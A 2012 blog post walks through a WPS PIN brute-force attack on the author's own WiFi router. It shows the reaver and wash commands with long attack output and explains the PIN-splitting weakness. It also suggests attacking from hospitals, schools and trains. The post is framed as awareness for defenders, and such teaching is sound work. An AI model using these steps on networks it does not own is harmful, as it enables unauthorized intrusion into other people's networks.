9 September, 2012 (published)
10 September, 2012 (last modified)

Brute-force attack on a WiFi network

  Categories: Linux
  Tags:  , , , , , ,

WiFi is popular. People have such a network at home. ISP supply their bandwidth through WiFi and in many public places – like airports, trains, bars, hotels –  WiFi service is available. This post is the third in a series of discussing WiFi vulnerabilities. Earlier post were:

1. What chipset is in your wireless adapter?

2. Monitoring WiFi traffic of your neighbors

Anyone can read this post but in case you want to try it yourself you have to have a Linux computer with a wireless adapter in monitor mode, as described in detail in the two previous posts.

If you are a journalist in the broad sense of the word (which includes bloggers etc) in some countries (like The Netherlands) you are allowed to attack an important  public network if your intention is to expose a vulnerability. Getting in is quite something else than poking around and copying and editing stuff.

In all other cases it is forbidden, unless explicitly allowed by the owner, to try to get into somebody else’s network. As my neighbors do not classify as administrators of important public networks I decided to attack my own WiFi.

Criminals, law-enforcement officers and all kinds of secret agents (like NSA, FBI, CIA and HLS) are not  - or do not feel – bound by these restrictions. The purpose of this post is to show you how they can crack your wireless network, so you can protect yourself against them if you wish.

PIN weakness
The PIN code of the WPS protocol is 8 digits long, of which the last digit is a parity digit. The WPS protocol is quite stupid in separating the 7 independent digits into two parts. The first part consist of the first 4 digits (10000 combinations) and the last part of the remaining three digits (1000 combinations). Now it comes: every attempt from a wireless adapter with a wrong PIN will get as answer from the WPS-enabled Access Point (AP) confirmation information about the first part and about second part of the PIN separately. As a result after only 11000 tries the correct pin will have been found. In practice this might occur much earlier. After the AP is interrogated with the correct PIN it will acknowledges the correctness and release the password to the wireless adapter.

Reaver attack
The US company Tactical Network Solutions has released a downloadable Linux open-source software package, called reaver, that attacks APs by trying all PINS. So download the reaver package from the web to your Linux computer and install it.

After you have installed the reaver package there are two commands relevant (i) wash and (ii) reaver. We will first run wash, as that program will tells us what WiFi APs in your neighborhood can be attacked, that is  that are within range and have WPS enabled.

So run wash on the monitor interface (wireless in monitor mode please).

wash -i mon0

root@HP-MEDIAMARKT:/home/adlag# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
x8D:B0:5B      11            -27        1.0               No                UPC00000000
xB0:99:4C      11            -27        1.0               No                SitecomB0994C
xAA:98:30      11            -61        1.0               No                SitecomZZZZZ
xB2:9B:29      11            -81        1.0               No                XXXXX
xA2:21:C4      11            -60        1.0               No                SitecomWWWW
xB8:5D:50       3            -82        1.0               No                XXX
x18:41:A0       4            -88        1.0               No                ARVYYYYYYY

To protect my neighbors I have changed those entries that could identify them.

Let us attack my own router. That is to say I want to discover the password of the router SitecomB0994C without ever physically touching the router or reading any of its labels. Nor did I navigate a browser to ip-address 192.168.0.1 with my laptop connected to this router. That all would be cheating. I just pretended to be my neighbor and analyzed the frames sent by my router.

The program reaver has a number of switches (just run reaver without any switches and you will get all the switches).

In my particular case I ran

reaver -i mon0 -b 00:0C:F6:B0:99:4C -vv -c 11

Reaver requires a little tuning because APs migh have different latency times. My AP (Sitecom router) could handle a PIN try every 2 seconds. After 10000 seconds my pin was cracked and the password was shown.

Here I will show the first part of the attack.

root@HP-MEDIAMARKT:/home/adlag# reaver -i mon0 -b 00:0C:F6:B0:99:4C -vv  -c 11

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 

[+] Switching mon0 to channel 11
[?] Restore previous session for 00:0C:F6:B0:99:4C? [n/Y] n
[+] Waiting for beacon from 00:0C:F6:B0:99:4C
[+] Associated with 00:0C:F6:B0:99:4C (ESSID: SitecomB0994C)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 22225672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 22225672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2012-09-04 12:56:05 (3 seconds/pin)

On the internet there are quite a number of complaints about getting reaver to work. For that reason I publish the whole attack for those interested (text file of 0.6MB). The only thing I changed was that I removed my password as I still want to use my Sitecom router. As I have published this I had to change my PIN. I should be careful because if I would reset my router to default the old PIN – the one the whole world now knows, will be effective again.

Limitations
The biggest limitation in attacking WPS-enabled routers is that the cheap wireless adapters hardly radiate any power. For two reasons: (i) the adapter would be more expensive and (ii) the adapter would consume more power at the cost of your battery life. In practice you have with your wireless adapter to be quite close to the source (AP). This can be acomplished by going very close to your neighbor. Attacking is easier when you go to places where the public is allowed and you can hang around for a few hours, like hospitals,  city halls, media studio’s, schools (to up your grades) and trains.

Professionals
For professionals the limit of small signals can easily be overcome. All you need is a high-power wireless adapter or an amplifier. Tactical Network Solutions sells such professional kits and they sell mproved software. If you are in the US military or are friends with them you can buy military grade wlan amplifiers. I am sure criminals and people in “evil” countries can get hold of them as well. Equipped with such amplified system the only thing the bad guys have to do is to park a van in front of your house, or go inside a public building and within two hours they cracked the wifi.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
         

1 reaction op “Brute-force attack on a WiFi network”

  1. luciano says:

    só server para linux????

Write a reaction

By submitting a comment here you grant this site a perpetual license to reproduce your words and name/web site in attribution.